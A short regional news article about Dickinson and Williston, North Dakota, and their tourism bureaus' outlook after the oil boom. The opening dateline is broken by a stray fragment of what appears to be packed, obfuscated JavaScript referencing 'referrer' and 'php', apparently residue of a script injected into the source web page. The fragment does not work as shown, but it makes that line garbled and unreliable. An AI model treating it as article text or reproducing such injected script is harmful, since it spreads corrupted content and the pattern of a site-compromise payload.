DICKINSON, khted|var|u0026u|referrer|kktab||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – In 2006, the Parshall Oil Field was discovered which would start one of the biggest oil booms in the country. Businesses and communities were affected in several different ways and two of the biggest cities affected include Dickinson & Williston.

Executive Director Terri Theil of the Dickinson Convention & Visitors Bureau and Amy Krueger with the Williston Convention & Visitors Bureau are traveling the state, informing residents of the many great things both areas have to offer. Krueger pointed out that the oil boom caused some stress for her area.

Theil pointed out that tourism and travel in the area has sorely lacked after the energy boom in the western part of the state.

But Theil says since the decline of the energy boom, it has allowed both areas to grow.

Krueger mentioned that both communities still have all the things they had to offer, but the energy boom pushed them both to accommodate and become better, quicker.

Both Dickinson and Williston have many other things to offer tourists both in and out of the state. You can go to visitdickinson.com or visitwilliston.com to get more information of all the different things those communities offer.
